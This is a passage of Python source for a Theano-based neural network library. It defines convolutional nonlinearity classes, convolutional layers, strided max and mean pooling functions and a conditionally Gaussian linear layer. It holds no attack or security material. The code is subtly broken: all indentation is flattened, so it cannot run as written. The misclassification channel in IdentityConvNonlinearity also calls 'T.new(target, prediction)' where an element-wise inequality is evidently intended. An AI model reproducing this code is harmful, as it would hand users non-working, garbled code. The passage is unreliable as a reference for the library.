interest for this layer.
"""
rval = self._get_monitoring_channels_for_activations(state)
return rval
class IdentityConvNonlinearity(ConvNonlinearity):
"""
Linear convolutional nonlinearity class.
"""
def __init__(self):
self.non_lin_name = "linear"
@wraps(ConvNonlinearity.get_monitoring_channels_from_state)
def get_monitoring_channels_from_state(self,
state,
target,
cost_fn=False):
rval = super(IdentityConvNonlinearity,
self).get_monitoring_channels_from_state(state,
target,
cost_fn)
if target is not None:
prediction = T.gt(state, 0.5)
incorrect = T.new(target, prediction).max(axis=1)
rval["misclass"] = T.cast(incorrect, config.floatX).mean()
return rval
class RectifierConvNonlinearity(ConvNonlinearity):
"""
A simple rectifier nonlinearity class for convolutional layers.
Parameters
----------
left_slope : float
The slope of the left half of the activation function.
"""
def __init__(self, left_slope=0.0):
"""
Parameters
----------
left_slope : float, optional
left slope for the linear response of the rectifier function.
default is 0.0.
"""
self.non_lin_name = "rectifier"
self.left_slope = left_slope
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the rectifier nonlinearity over the convolutional layer.
"""
p = linear_response * (linear_response > 0.) + self.left_slope *\
linear_response * (linear_response < 0.)
return p
class SigmoidConvNonlinearity(ConvNonlinearity):
"""
Sigmoid nonlinearity class for convolutional layers.
Parameters
----------
monitor_style : str, optional
default monitor_style is "classification".
This determines whether to do classification or detection.
"""
def __init__(self, monitor_style="classification"):
assert monitor_style in ['classification', 'detection']
self.monitor_style = monitor_style
self.non_lin_name = "sigmoid"
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the sigmoid nonlinearity over the convolutional layer.
"""
rval = OrderedDict()
p = T.nnet.sigmoid(linear_response)
return p
@wraps(ConvNonlinearity.get_monitoring_channels_from_state)
def get_monitoring_channels_from_state(self, state, target,
cost_fn=None):
rval = super(SigmoidConvNonlinearity,
self).get_monitoring_channels_from_state(state,
target,
cost_fn)
if target is not None:
y_hat = state > 0.5
y = target > 0.5
wrong_bit = T.cast(T.neq(y, y_hat), state.dtype)
rval['01_loss'] = wrong_bit.mean()
rval['kl'] = cost_fn(Y_hat=state, Y=target)
y = T.cast(y, state.dtype)
y_hat = T.cast(y_hat, state.dtype)
tp = (y * y_hat).sum()
fp = ((1 - y) * y_hat).sum()
precision = compute_precision(tp, fp)
recall = compute_recall(y, tp)
f1 = compute_f1(precision, recall)
rval['precision'] = precision
rval['recall'] = recall
rval['f1'] = f1
tp = (y * y_hat).sum(axis=[0, 1])
fp = ((1 - y) * y_hat).sum(axis=[0, 1])
precision = compute_precision(tp, fp)
rval['per_output_precision_max'] = precision.max()
rval['per_output_precision_mean'] = precision.mean()
rval['per_output_precision_min'] = precision.min()
recall = compute_recall(y, tp)
rval['per_output_recall_max'] = recall.max()
rval['per_output_recall_mean'] = recall.mean()
rval['per_output_recall_min'] = recall.min()
f1 = compute_f1(precision, recall)
rval['per_output_f1_max'] = f1.max()
rval['per_output_f1_mean'] = f1.mean()
rval['per_output_f1_min'] = f1.min()
return rval
class TanhConvNonlinearity(ConvNonlinearity):
"""
Tanh nonlinearity class for convolutional layers.
"""
def __init__(self):
self.non_lin_name = "tanh"
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the tanh nonlinearity over the convolutional layer.
"""
p = T.tanh(linear_response)
return p
class ConvElemwise(Layer):
"""
Generic convolutional elemwise layer.
Takes the ConvNonlinearity object as an argument and implements
convolutional layer with the specified nonlinearity.
This function can implement:
* Linear convolutional layer
* Rectifier convolutional layer
* Sigmoid convolutional layer
* Tanh convolutional layer
based on the nonlinearity argument that it recieves.
Parameters
----------
output_channels : int
The number of output channels the layer should have.
kernel_shape : tuple
The shape of the convolution kernel.
pool_shape : tuple
The shape of the spatial max pooling. A two-tuple of ints.
pool_stride : tuple
The stride of the spatial max pooling. Also must be square.
layer_name : str
A name for this layer that will be prepended to monitoring channels
related to this layer.
nonlinearity : object
An instance of a nonlinearity object which might be inherited
from the ConvNonlinearity class.
irange : float, optional
if specified, initializes each weight randomly in
U(-irange, irange)
border_mode : str, optional
A string indicating the size of the output:
- "full" : The output is the full discrete linear convolution of the
inputs.
- "valid" : The output consists only of those elements that do not
rely on the zero-padding. (Default)
sparse_init : WRITEME
include_prob : float, optional
probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is initialized
to 1.0.
init_bias : float, optional
All biases are initialized to this number. Default is 0.
W_lr_scale : float or None
The learning rate on the weights for this layer is multiplied by this
scaling factor
b_lr_scale : float or None
The learning rate on the biases for this layer is multiplied by this
scaling factor
max_kernel_norm : float or None
If specified, each kernel is constrained to have at most this norm.
pool_type : str or None
The type of the pooling operation performed the convolution.
Default pooling type is max-pooling.
tied_b : bool, optional
If true, all biases in the same channel are constrained to be the
same as each other. Otherwise, each bias at each location is
learned independently. Default is true.
detector_normalization : callable or None
See `output_normalization`.
If pooling argument is not provided, detector_normalization
is not applied on the layer.
output_normalization : callable or None
if specified, should be a callable object. the state of the
network is optionally replaced with normalization(state) at each
of the 3 points in processing:
- detector: the maxout units can be normalized prior to the
spatial pooling
- output: the output of the layer, after sptial pooling, can
be normalized as well
kernel_stride : 2-tuple of ints, optional
The stride of the convolution kernel. Default is (1, 1).
"""
def __init__(self,
output_channels,
kernel_shape,
layer_name,
nonlinearity,
irange=None,
border_mode='valid',
sparse_init=None,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
max_kernel_norm=None,
pool_type=None,
pool_shape=None,
pool_stride=None,
tied_b=None,
detector_normalization=None,
output_normalization=None,
kernel_stride=(1, 1),
monitor_style="classification"):
super(ConvElemwise, self).__init__()
if (irange is None) and (sparse_init is None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvElemwise.")
elif (irange is not None) and (sparse_init is not None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvElemwise and not both.")
if pool_type is not None:
assert pool_shape is not None, (
"You should specify the shape of "
"the spatial %s-pooling." % pool_type)
assert pool_stride is not None, (
"You should specify the strides of "
"the spatial %s-pooling." % pool_type)
assert nonlinearity is not None
self.nonlin = nonlinearity
self.__dict__.update(locals())
assert monitor_style in ['classification', 'detection'], (
"%s.monitor_style should be either"
"detection or classification" % self.__class__.__name__)
del self.self
def initialize_transformer(self, rng):
"""
This function initializes the transformer of the class. Re-running
this function will reset the transformer.
Parameters
----------
rng : object
random number generator object.
"""
if self.irange is not None:
assert self.sparse_init is None
self.transformer = conv2d.make_random_conv2D(
irange=self.irange,
input_space=self.input_space,
output_space=self.detector_space,
kernel_shape=self.kernel_shape,
subsample=self.kernel_stride,
border_mode=self.border_mode,
rng=rng)
elif self.sparse_init is not None:
self.transformer = conv2d.make_sparse_random_conv2D(
num_nonzero=self.sparse_init,
input_space=self.input_space,
output_space=self.detector_space,
kernel_shape=self.kernel_shape,
subsample=self.kernel_stride,
border_mode=self.border_mode,
rng=rng)
def initialize_output_space(self):
"""
Initializes the output space of the ConvElemwise layer by taking
pooling operator and the hyperparameters of the convolutional layer
into consideration as well.
"""
dummy_batch_size = self.mlp.batch_size
if dummy_batch_size is None:
dummy_batch_size = 2
dummy_detector =\
sharedX(self.detector_space.get_origin_batch(dummy_batch_size))
if self.pool_type is not None:
assert self.pool_type in ['max', 'mean']
if self.pool_type == 'max':
dummy_p = max_pool(bc01=dummy_detector,
pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
elif self.pool_type == 'mean':
dummy_p = mean_pool(bc01=dummy_detector,
pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
dummy_p = dummy_p.eval()
self.output_space = Conv2DSpace(shape=[dummy_p.shape[2],
dummy_p.shape[3]],
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
else:
dummy_detector = dummy_detector.eval()
self.output_space = Conv2DSpace(shape=[dummy_detector.shape[2],
dummy_detector.shape[3]],
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
logger.info('Output space: {0}'.format(self.output_space.shape))
@wraps(Layer.set_input_space)
def set_input_space(self, space):
""" Note: this function will reset the parameters! """
self.input_space = space
if not isinstance(space, Conv2DSpace):
raise BadInputSpaceError(self.__class__.__name__ +
".set_input_space "
"expected a Conv2DSpace, got " +
str(space) + " of type " +
str(type(space)))
rng = self.mlp.rng
if self.border_mode == 'valid':
output_shape = [int((self.input_space.shape[0]
- self.kernel_shape[0])
/ self.kernel_stride[0]) + 1,
int((self.input_space.shape[1]
- self.kernel_shape[1])
/ self.kernel_stride[1]) + 1]
elif self.border_mode == 'full':
output_shape = [int((self.input_space.shape[0]
+ self.kernel_shape[0])
/ self.kernel_stride[0]) - 1,
int((self.input_space.shape[1]
+ self.kernel_shape[1])
/ self.kernel_stride[1]) - 1]
self.detector_space = Conv2DSpace(shape=output_shape,
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
self.initialize_transformer(rng)
W, = self.transformer.get_params()
W.name = self.layer_name + '_W'
if self.tied_b:
self.b = sharedX(np.zeros((self.detector_space.num_channels)) +
self.init_bias)
else:
self.b = sharedX(self.detector_space.get_origin() + self.init_bias)
self.b.name = self.layer_name + '_b'
logger.info('Input shape: {0}'.format(self.input_space.shape))
logger.info('Detector space: {0}'.format(self.detector_space.shape))
self.initialize_output_space()
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.max_kernel_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=(1, 2, 3)))
desired_norms = T.clip(row_norms, 0, self.max_kernel_norm)
updates[W] = updated_W * (
desired_norms /
(1e-7 + row_norms)).dimshuffle(0, 'x', 'x', 'x')
@wraps(Layer.get_params)
def get_params(self):
assert self.b.name is not None
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
outp, inp, rows, cols = range(4)
raw = self.transformer._filters.get_value()
return np.transpose(raw, (outp, rows, cols, inp))
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
W, = self.transformer.get_params()
assert W.ndim == 4
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=(1, 2, 3)))
rval = OrderedDict([
('kernel_norms_min', row_norms.min()),
('kernel_norms_mean', row_norms.mean()),
('kernel_norms_max', row_norms.max()),
])
cst = self.cost
orval = self.nonlin.get_monitoring_channels_from_state(state,
targets,
cost_fn=cst)
rval.update(orval)
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
z = self.transformer.lmul(state_below)
if not hasattr(self, 'tied_b'):
self.tied_b = False
if self.tied_b:
b = self.b.dimshuffle('x', 0, 'x', 'x')
else:
b = self.b.dimshuffle('x', 0, 1, 2)
z = z + b
d = self.nonlin.apply(z)
if self.layer_name is not None:
d.name = self.layer_name + '_z'
self.detector_space.validate(d)
if self.pool_type is not None:
if not hasattr(self, 'detector_normalization'):
self.detector_normalization = None
if self.detector_normalization:
d = self.detector_normalization(d)
assert self.pool_type in ['max', 'mean'], ("pool_type should be"
"either max or mean"
"pooling.")
if self.pool_type == 'max':
p = max_pool(bc01=d, pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
elif self.pool_type == 'mean':
p = mean_pool(bc01=d, pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
self.output_space.validate(p)
else:
p = d
if not hasattr(self, 'output_normalization'):
self.output_normalization = None
if self.output_normalization:
p = self.output_normalization(p)
return p
def cost(self, Y, Y_hat):
"""
Cost for convnets is hardcoded to be the cost for sigmoids.
TODO: move the cost into the non-linearity class.
Parameters
----------
Y : theano.gof.Variable
Output of `fprop`
Y_hat : theano.gof.Variable
Targets
Returns
-------
cost : theano.gof.Variable
0-D tensor describing the cost
Notes
-----
Cost mean across units, mean across batch of KL divergence
KL(P || Q) where P is defined by Y and Q is defined by Y_hat
KL(P || Q) = p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
"""
assert self.nonlin.non_lin_name == "sigmoid", ("ConvElemwise "
"supports "
"cost function "
"for only "
"sigmoid layer "
"for now.")
batch_axis = self.output_space.get_batch_axis()
ave_total = kl(Y=Y, Y_hat=Y_hat, batch_axis=batch_axis)
ave = ave_total.mean()
return ave
class ConvRectifiedLinear(ConvElemwise):
"""
A convolutional rectified linear layer, based on theano's B01C
formatted convolution.
Parameters
----------
output_channels : int
The number of output channels the layer should have.
kernel_shape : tuple
The shape of the convolution kernel.
pool_shape : tuple
The shape of the spatial max pooling. A two-tuple of ints.
pool_stride : tuple
The stride of the spatial max pooling. Also must be square.
layer_name : str
A name for this layer that will be prepended to monitoring channels
related to this layer.
irange : float
if specified, initializes each weight randomly in
U(-irange, irange)
border_mode : str
A string indicating the size of the output:
- "full" : The output is the full discrete linear convolution of the
inputs.
- "valid" : The output consists only of those elements that do not
rely on the zero-padding. (Default)
include_prob : float
probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is initialized
to 0.
init_bias : float
All biases are initialized to this number
W_lr_scale : float
The learning rate on the weights for this layer is multiplied by this
scaling factor
b_lr_scale : float
The learning rate on the biases for this layer is multiplied by this
scaling factor
left_slope : float
The slope of the left half of the activation function
max_kernel_norm : float
If specifed, each kernel is constrained to have at most this norm.
pool_type :
The type of the pooling operation performed the the convolution.
Default pooling type is max-pooling.
tied_b : bool
If true, all biases in the same channel are constrained to be the
same as each other. Otherwise, each bias at each location is
learned independently.
detector_normalization : callable
See `output_normalization`
output_normalization : callable
if specified, should be a callable object. the state of the
network is optionally replaced with normalization(state) at each
of the 3 points in processing:
- detector: the rectifier units can be normalized prior to the
spatial pooling
- output: the output of the layer, after spatial pooling, can
be normalized as well
kernel_stride : tuple
The stride of the convolution kernel. A two-tuple of ints.
"""
def __init__(self,
output_channels,
kernel_shape,
pool_shape,
pool_stride,
layer_name,
irange=None,
border_mode='valid',
sparse_init=None,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
left_slope=0.0,
max_kernel_norm=None,
pool_type='max',
tied_b=False,
detector_normalization=None,
output_normalization=None,
kernel_stride=(1, 1),
monitor_style="classification"):
nonlinearity = RectifierConvNonlinearity(left_slope)
if (irange is None) and (sparse_init is None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvRectifiedLinear.")
elif (irange is not None) and (sparse_init is not None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvRectifiedLinear and not both.")
# Alias the variables for pep8
mkn = max_kernel_norm
dn = detector_normalization
on = output_normalization
super(ConvRectifiedLinear, self).__init__(output_channels,
kernel_shape,
layer_name,
nonlinearity,
irange=irange,
border_mode=border_mode,
sparse_init=sparse_init,
include_prob=include_prob,
init_bias=init_bias,
W_lr_scale=W_lr_scale,
b_lr_scale=b_lr_scale,
pool_shape=pool_shape,
pool_stride=pool_stride,
max_kernel_norm=mkn,
pool_type=pool_type,
tied_b=tied_b,
detector_normalization=dn,
output_normalization=on,
kernel_stride=kernel_stride,
monitor_style=monitor_style)
def pool_dnn(bc01, pool_shape, pool_stride, mode='max'):
"""
cuDNN pooling op.
Parameters
----------
bc01 : theano tensor
Minibatch in format (batch size, channels, rows, cols).
pool_shape : tuple
Shape of the pool region (rows, cols).
pool_stride : tuple
Strides between pooling regions (row stride, col stride).
mode : str
Flag for `mean` or `max` pooling.
Returns
-------
mx : theano tensor
The output of pooling applied to `bc01`.
"""
assert mode in ['max', 'mean']
if mode == 'mean':
raise NotImplementedError('Mean pooling is not implemented '
'in Pylearn2 using cuDNN as of '
'January 19th, 2015.')
mx = dnn_pool(bc01, tuple(pool_shape), tuple(pool_stride), mode)
return mx
def max_pool(bc01, pool_shape, pool_stride, image_shape, try_dnn=True):
"""
Theano's max pooling op only supports pool_stride = pool_shape
so here we have a graph that does max pooling with strides
Parameters
----------
bc01 : theano tensor
minibatch in format (batch size, channels, rows, cols)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
avoid doing some of the arithmetic in theano
try_dnn : bool
Flag to set cuDNN use (default: True).
Returns
-------
pooled : theano tensor
The output of pooling applied to `bc01`
See Also
--------
max_pool_c01b : Same functionality but with ('c', 0, 1, 'b') axes
sandbox.cuda_convnet.pool.max_pool_c01b : Same functionality as
`max_pool_c01b` but GPU-only and considerably faster.
mean_pool : Mean pooling instead of max pooling
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
assert pr <= r
assert pc <= c
name = bc01.name
if name is None:
name = 'anon_bc01'
if try_dnn and bc01.dtype == "float32":
use_dnn = dnn_available()
else:
use_dnn = False
if pool_shape == pool_stride and not use_dnn:
mx = max_pool_2d(bc01, pool_shape, False)
mx.name = 'max_pool(' + name + ')'
return mx
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
# Catch case where p_strd > p_shp causes pool
# to be set outside of im_shp.
if p_strd * rval >= im_shp:
rval -= 1
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for bc01v in get_debug_values(bc01):
assert not contains_inf(bc01v)
assert bc01v.shape[2] == image_shape[0]
assert bc01v.shape[3] == image_shape[1]
if (required_r > r) or (required_c > c):
small_r = min(required_r, r)
small_c = min(required_c, c)
assert bc01.dtype.startswith('float')
wide_infinity = T.alloc(T.constant(-np.inf, dtype=bc01.dtype),
bc01.shape[0],
bc01.shape[1],
required_r,
required_c)
bc01 = T.set_subtensor(wide_infinity[:, :, 0:small_r, 0:small_c],
bc01[:, :, 0:small_r, 0:small_c])
name = 'infinite_padded_' + name
if use_dnn:
mx = pool_dnn(bc01, pool_shape, pool_stride, 'max')
else:
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = bc01[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
cur.name = ('max_pool_cur_' + name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
if mx is None:
mx = cur
else:
mx = T.maximum(mx, cur)
mx.name = ('max_pool_mx_' + name + '_' +
str(row_within_pool) + '_' +
str(col_within_pool))
mx.name = 'max_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
def max_pool_c01b(c01b, pool_shape, pool_stride, image_shape):
"""
Theano's max pooling op only supports pool_stride = pool_shape
so here we have a graph that does max pooling with strides
Parameters
----------
c01b : theano tensor
minibatch in format (channels, rows, cols, batch size)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
avoid doing some of the arithmetic in theano
Returns
-------
pooled : theano tensor
The output of pooling applied to `c01b`
See Also
--------
sandbox.cuda_convnet.pool.max_pool_c01b : Same functionality but GPU-only
and considerably faster.
max_pool : Same functionality but with ('b', 0, 1, 'c') axes
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
assert pr > 0
assert pc > 0
assert pr <= r
assert pc <= c
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for c01bv in get_debug_values(c01b):
assert not contains_inf(c01bv)
assert c01bv.shape[1] == r
assert c01bv.shape[2] == c
wide_infinity = T.alloc(-np.inf,
c01b.shape[0],
required_r,
required_c,
c01b.shape[3])
name = c01b.name
if name is None:
name = 'anon_bc01'
c01b = T.set_subtensor(wide_infinity[:, 0:r, 0:c, :], c01b)
c01b.name = 'infinite_padded_' + name
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = c01b[:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs,
:]
cur.name = ('max_pool_cur_' + c01b.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
if mx is None:
mx = cur
else:
mx = T.maximum(mx, cur)
mx.name = ('max_pool_mx_' + c01b.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
mx.name = 'max_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
def mean_pool(bc01, pool_shape, pool_stride, image_shape):
"""
Does mean pooling (aka average pooling) via a Theano graph.
Parameters
----------
bc01 : theano tensor
minibatch in format (batch size, channels, rows, cols)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
(rows, cols) tuple to avoid doing some arithmetic in theano
Returns
-------
pooled : theano tensor
The output of pooling applied to `bc01`
See Also
--------
max_pool : Same thing but with max pooling
Examples
--------
>>> import theano
>>> import theano.tensor as T
>>> from pylearn2.models.mlp import mean_pool
>>> import numpy as np
>>> t = np.array([[1, 1, 3, 3],
... [1, 1, 3, 3],
... [5, 5, 7, 7],
... [5, 5, 7, 7],
... [9, 9, 11, 11],
... [9, 9, 11, 11]])
>>> X = np.zeros((3, t.shape[0], t.shape[1]))
>>> X[:] = t
>>> X = X[np.newaxis]
>>> X_sym = T.tensor4('X')
>>> pool_it = mean_pool(X_sym, pool_shape=(2, 2), pool_stride=(2, 2),
... image_shape=(6, 4))
>>> f = theano.function(inputs=[X_sym], outputs=pool_it)
This will pool over over windows of size (2, 2) while also stepping by this
same amount, shrinking the examples input to [[1, 3], [5, 7], [9, 11]].
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
pool_stride[0]) * pool_stride[0]
# Compute number of rows needed in image for all indexes to work out
required_r = last_pool_r + pr
last_pool_c = last_pool(image_shape[1],
pool_shape[1],
pool_stride[1]) * pool_stride[1]
required_c = last_pool_c + pc
for bc01v in get_debug_values(bc01):
assert not contains_inf(bc01v)
assert bc01v.shape[2] == image_shape[0]
assert bc01v.shape[3] == image_shape[1]
wide_infinity = T.alloc(-np.inf,
bc01.shape[0],
bc01.shape[1],
required_r,
required_c)
name = bc01.name
if name is None:
name = 'anon_bc01'
bc01 = T.set_subtensor(wide_infinity[:, :, 0:r, 0:c], bc01)
bc01.name = 'infinite_padded_' + name
# Create a 'mask' used to keep count of the number of elements summed for
# each position
wide_infinity_count = T.alloc(0, bc01.shape[0], bc01.shape[1], required_r,
required_c)
bc01_count = T.set_subtensor(wide_infinity_count[:, :, 0:r, 0:c], 1)
for row_within_pool in xrange(pool_shape[0]):
row_stop = last_pool_r + row_within_pool + 1
for col_within_pool in xrange(pool_shape[1]):
col_stop = last_pool_c + col_within_pool + 1
cur = bc01[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
cur.name = ('mean_pool_cur_' + bc01.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
cur_count = bc01_count[:,
:,
row_within_pool:row_stop:rs,
col_within_pool:col_stop:cs]
if mx is None:
mx = cur
count = cur_count
else:
mx = mx + cur
count = count + cur_count
mx.name = ('mean_pool_mx_' + bc01.name + '_' +
str(row_within_pool) + '_' + str(col_within_pool))
mx /= count
mx.name = 'mean_pool(' + name + ')'
for mxv in get_debug_values(mx):
assert isfinite(mxv)
return mx
@wraps(_WD)
def WeightDecay(*args, **kwargs):
warnings.warn("pylearn2.models.mlp.WeightDecay has moved to "
"pylearn2.costs.mlp.WeightDecay. This link"
"may be removed after 2015-05-13.")
return _WD(*args, **kwargs)
@wraps(_L1WD)
def L1WeightDecay(*args, **kwargs):
warnings.warn("pylearn2.models.mlp.L1WeightDecay has moved to "
"pylearn2.costs.mlp.WeightDecay. This link"
"may be removed after 2015-05-13.")
return _L1WD(*args, **kwargs)
class LinearGaussian(Linear):
"""
A Linear layer augmented with a precision vector, for modeling
conditionally Gaussian data.
Specifically, given an input x, this layer models the distrbution over
the output as
y ~ p(y | x) = N(y | Wx + b, beta^-1)
i.e., y is conditionally Gaussian with mean Wx + b and variance
beta^-1.
beta is a diagonal precision matrix so beta^-1 is a diagonal covariance
matrix.
Internally, beta is stored as the vector of diagonal values on this
matrix.
Since the output covariance is not a function of the input, this does
not provide an example-specific estimate of the error in the mean.
However, the vector-valued beta does mean that maximizing log p(y | x)
will reweight the mean squared error so that variables that can be
estimated easier will receive a higher penalty. This is one way of
adapting the model better to heterogenous data.
Parameters
----------
init_beta : float or ndarray
Any value > 0 that can be broadcasted to a vector of shape (dim, ).
The elements of beta are initialized to this value.
A good value is often the precision (inverse variance) of the target
variables in the training set, as provided by the
`beta_from_targets` function. This is the optimal beta for a dummy
model that just predicts the mean target value from the training set.
min_beta : float
The elements of beta are constrained to be >= this value.
This value must be > 0., otherwise the output conditional is not
constrained to be a valid probability distribution.
A good value is often the precision (inverse variance) of the target
variables in the training set, as provided by the
`beta_from_targets` function. This is the optimal beta for a dummy
model that just predicts the mean target value from the training set.
A trained model should always be able to obtain at least this much
precision, at least on the training set.
max_beta : float
The elements of beta are constrained to be <= this value.
We impose this constraint because for problems
where the training set values can be predicted
exactly, beta can grow without bound, which also makes the
gradients grow without bound, resulting in numerical problems.
kwargs : dict
Arguments to the `Linear` superclass.
"""
def __init__(self, init_beta, min_beta, max_beta, beta_lr_scale, **kwargs):
super(LinearGaussian, self).__init__(**kwargs)
self.__dict__.update(locals())
del self.self
del self.kwargs
@wraps(Layer.set_input_space)
def set_input_space(self, space):
super(LinearGaussian, self).set_input_space(space)
assert isinstance(self.output_space, VectorSpace)
self.beta = sharedX(self.output_space.get_origin() + self.init_beta,
'beta')
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = super(LinearGaussian,
self).get_layer_monitoring_channels(state_below,
state,
targets)
assert isinstance(rval, OrderedDict)
rval['beta_min'] = self.beta.min()
rval['beta_mean'] = self.beta.mean()
rval['beta_max'] = self.beta.max()
if targets:
rval['mse'] = T.sqr(state - targets).mean()
return rval
@wraps(Linear.cost)
def cost(self, Y, Y_hat):
return (0.5 * T.dot(T.sqr(Y - Y_hat), self.beta).mean() -
0.5 * T.log(self.beta).sum())
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
super(LinearGaussian, self)._modify_updates(updates)
if self.beta in updates:
updates[self.beta] = T.clip(updates[self.beta],
self.min_beta,
self.max_beta)
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
rval = super(LinearGaussian, self).get_lr_scalers()
if self.beta_lr_scale is not None:
rval[self.beta] = self.beta_lr_scale
return rval
@wraps(Layer.get_params)
def get_params(self):
return super(LinearGaussian, self).get_params() + [self.beta]
def beta_from_design(design, min_var=1e-6, max_var=1e6):
"""
Returns the marginal precision of a design matrix.
Parameters
----------
design : ndarray
A numpy ndarray containing a design matrix
min_var : float
max_var : float
All variances are constrained to lie in the range [min_var, max_var]
to avoid numerical issues like infinite precision.
Returns
-------
beta : ndarray
A 1D vector containing the marginal precision of each variable in the
design matrix.
"""
return 1. / np.clip(design.var(axis=0), min_var, max_var)
def beta_from_targets(dataset, **kwargs):
"""
Returns the marginal precision of the targets in a dataset.
Parameters
----------
dataset : DenseDesignMatrix
